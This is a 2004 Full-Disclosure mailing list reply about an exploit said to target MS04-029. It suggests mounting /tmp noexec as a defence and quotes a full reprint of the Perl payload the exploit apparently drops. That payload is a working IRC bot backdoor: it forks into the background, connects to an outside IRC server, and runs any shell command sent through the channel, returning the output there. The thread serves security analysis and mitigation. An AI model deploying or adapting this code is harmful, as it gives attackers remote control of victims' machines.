Re: New Remote Windows Exploit (MS04-029)

[Rodrigo Barbosa <rodrigob () suespammers org>]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Does anyone still have /tmp without noexec ?

/dev/sda2 on /tmp type ext3 (rw,noexec,nodev,nosuid)

On Wed, Nov 03, 2004 at 10:58:54PM -0500, Brendan Dolan-Gavitt wrote:
> Here's a rather tidier version of the perl it drops in /tmp/hi,
> courtesy of PerlTidy.

> #!/usr/bin/perl
> $chan      = "#0x";
> $nick      = "k";
> $server    = "ir3ip.net";
> $SIG{TERM} = {};
> exit if fork;
> use IO::Socket;
> $sock = IO::Socket::INET->new( $server . ":6667" ) || exit;
> print $sock "USER k +i k :kv1\nNICK k\n";
> $i = 1;
>
> while ( <$sock> =~ /^[^ ]+ ([^ ]+) / ) {
>     $mode = $1;
>     last if $mode == "001";
>     if ( $mode == "433" ) {
>         $i++;
>         $nick =~ s/\d*$/$i/;
>         print $sock "NICK $nick\n";
>     }
> }
> print $sock "JOIN $chan\nPRIVMSG $chan :Hi\n";
> while (<$sock>) {
>     if (/^PING (.*)$/) { print $sock "PONG $1\nJOIN $chan\n"; }
>     if (s/^[^ ]+ PRIVMSG $chan :$nick[^ :\w]*:[^ :\w]* (.*)$/$1/) {
>         s/\s*$//;
>         $_ = `$_`;
>         foreach ( split "\n" ) { print $sock "PRIVMSG $chan :$_\n"; sleep 1; }
>     }
> }    #/tmp/hi/tmp/hi


- -- 
Rodrigo Barbosa <rodrigob () suespammers org>
"Quid quid Latine dictum sit, altum viditur"
"Be excellent to each other ..." - Bill & Ted (Wyld Stallyns)

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.3 (GNU/Linux)

iD8DBQFBimfypdyWzQ5b5ckRAuUQAJ48GRrbT8dg4TuQSBmuY1gaFUFrTgCcDjAk
heUfzGqMnM0K/OkuPzts0bA=
=rZBE
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html